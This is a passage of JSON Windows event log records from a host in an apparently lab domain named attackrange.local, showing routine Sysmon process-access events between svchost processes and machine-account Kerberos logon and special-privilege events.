C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.509","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.509\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.509","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.509\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.509","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220702,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBEA2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xbbea2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220703,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBBEA2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t55020\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xbbea2","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"55020","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220704,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBFAF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xbbfaf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220705,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBBFAF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xbbfaf","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220706,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBFF9\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xbbff9","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220707,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBBFF9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t55021\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xbbff9","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"55021","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220708,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBC073\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xbc073","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220709,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBC073\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon 